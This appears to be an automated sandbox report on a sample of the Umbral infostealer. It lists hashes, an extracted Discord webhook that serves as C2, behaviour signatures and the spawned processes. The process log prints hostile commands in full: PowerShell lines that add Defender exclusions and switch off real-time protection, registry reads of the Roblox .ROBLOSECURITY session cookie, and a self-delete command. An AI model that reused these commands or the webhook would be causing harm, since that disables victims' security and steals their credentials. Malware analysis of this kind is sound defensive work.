Analysis

  • max time kernel
    16s
  • max time network
    16s
  • platform
    windows7_x64
  • resource
    win7-20240705-en
  • resource tags

    arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
  • submitted
    18-07-2024 08:26

General

  • Target

    8d053f5224f1e9023174aff9c4a30930N.exe

  • Size

    1.1MB

  • MD5

    8d053f5224f1e9023174aff9c4a30930

  • SHA1

    4780b25f7cde7d9e88d437fc749009471df400c7

  • SHA256

    bf071edf3408e6496ce99865ad5503b710a6f02eba715f3a8ff471672c600e98

  • SHA512

    f065df05bb2057c271fdcc076c29a2dd5bacdade2e1540383d74229b36a4ef9ecd527fe582227055b9aabb79bcc05ee1ed3326ef253c5b79deb0fa92c236007c

  • SSDEEP

    24576:faHMv6CorjSnypQDaG9u1WTI8SvtsyVtG1TOMdRYqcBO:f1vOjlpQDaGjVc

Malware Config

Extracted

Family

umbral

C2

https://discord.com/api/webhooks/1260648854106279966/keEurbS-DAu9o9HNLNkSZdNBwk9KX-R3JUCBdBHxavFpGd9oS74vrFD6KpTlKwSh5bvL

Signatures

  • Detect Umbral payload 3 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 47 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\8d053f5224f1e9023174aff9c4a30930N.exe
    "C:\Users\Admin\AppData\Local\Temp\8d053f5224f1e9023174aff9c4a30930N.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:288
    • C:\Users\Admin\AppData\Local\Temp\svchost.exe
      "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: GetForegroundWindowSpam
      PID:2080
    • C:\Users\Admin\AppData\Local\Temp\explorer.exe
      "C:\Users\Admin\AppData\Local\Temp\explorer.exe"
      2⤵
      • Drops file in Drivers directory
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2720
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2260
      • C:\Windows\system32\attrib.exe
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\explorer.exe"
        3⤵
        • Views/modifies file attributes
        PID:2108
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\explorer.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2644
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2468
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2300
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1736
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" os get Caption
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:848
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" computersystem get totalphysicalmemory
        3⤵
          PID:1216
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" csproduct get uuid
          3⤵
            PID:2968
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:2072
          • C:\Windows\System32\Wbem\wmic.exe
            "wmic" path win32_VideoController get name
            3⤵
            • Detects videocard installed
            PID:2208
          • C:\Windows\system32\cmd.exe
            "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\explorer.exe" && pause
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:604
            • C:\Windows\system32\PING.EXE
              ping localhost
              4⤵
              • Runs ping.exe
              PID:2524

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\E85PFX7T2DE3IMX6DAJL.temp

        Filesize

        7KB

        MD5

        dd088b8fcec3ebc16b119dbadb697e2e

        SHA1

        4a95b95c2a35db175f14075c7618f399fb08d5a1

        SHA256

        77212759f7ba75d0e35563879baa9468f8737e5bde36d9b5c9e8bb081997fe19

        SHA512

        3ae396be198a94559c95d58f9a4588fb17d797f78852f31a8e09de0cffcb642f236dc08d76b395a695cd02d224f2a3c226796d2f787d2c1626d17414f9b1ba3b

      • \Users\Admin\AppData\Local\Temp\explorer.exe

        Filesize

        230KB

        MD5

        98cfd3036140486ef4c019dd72f9afa5

        SHA1

        97e95eff14ede1be7ae411caa11548e66eeb2c29

        SHA256

        55885b4252672cea3e51bb8726b9b9a2dd93351f9b563e22ebaa223dd3e85e90

        SHA512

        f4634d6f9725abb47fd2597a82d4b0fbab2d99cb9a0ad95f23313274515b0a17f3efd3344d7b638a3ed292052c9c010f5c812084b92e37cabdbb0e203bf2e9dd

      • \Users\Admin\AppData\Local\Temp\svchost.exe

        Filesize

        850KB

        MD5

        e42d679a626463742b553794dea6f62b

        SHA1

        789c25a360342fd431dccbf01b831c36aa229317

        SHA256

        e4a3b0ce536c0996082311077ac65a096d9e6bbf404c6e6a155ecefb32e864c5

        SHA512

        9ff1ea63334ab8dc3b81edfd572c0e1a7483ac6912255c839aafbba88e0aa19334c2810966384f7998af697dcb9e4ee502cec276a11108c2f0f9510e2aa67279

      • memory/288-0-0x00000000742FE000-0x00000000742FF000-memory.dmp

        Filesize

        4KB

      • memory/288-1-0x00000000009B0000-0x0000000000AD4000-memory.dmp

        Filesize

        1.1MB

      • memory/2072-64-0x0000000002890000-0x0000000002898000-memory.dmp

        Filesize

        32KB

      • memory/2468-35-0x000000001B610000-0x000000001B8F2000-memory.dmp

        Filesize

        2.9MB

      • memory/2468-36-0x0000000002390000-0x0000000002398000-memory.dmp

        Filesize

        32KB

      • memory/2644-28-0x000000001B5C0000-0x000000001B8A2000-memory.dmp

        Filesize

        2.9MB

      • memory/2644-29-0x0000000001DA0000-0x0000000001DA8000-memory.dmp

        Filesize

        32KB

      • memory/2720-19-0x00000000000B0000-0x00000000000F0000-memory.dmp

        Filesize

        256KB